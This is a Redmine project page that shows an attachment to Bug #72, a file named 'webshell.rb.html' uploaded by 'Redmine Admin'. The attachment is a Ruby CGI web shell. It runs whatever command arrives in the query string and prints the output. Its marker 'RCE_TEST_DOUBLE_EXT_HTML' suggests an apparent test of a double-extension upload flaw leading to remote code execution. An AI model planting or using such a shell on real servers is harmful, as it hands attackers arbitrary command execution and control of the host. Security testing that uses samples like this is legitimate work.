⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
cmdtest1782618771
All Projects
cmdtest1782618771
Overview
Activity
Issues
Documents
Wiki
Files
Repository
Download (156 Bytes)
Bug #72
ยป webshell.rb.html
Redmine Admin
, 07/16/2026 08:40 AM
#!/usr/bin/env ruby
puts "Content-Type: text/plain\r\n\r\n"
cmd = ENV['QUERY_STRING'] || ''
puts "RCE_TEST_DOUBLE_EXT_HTML"
puts `#{cmd}` unless cmd.empty?
(1-1/1)
Loading...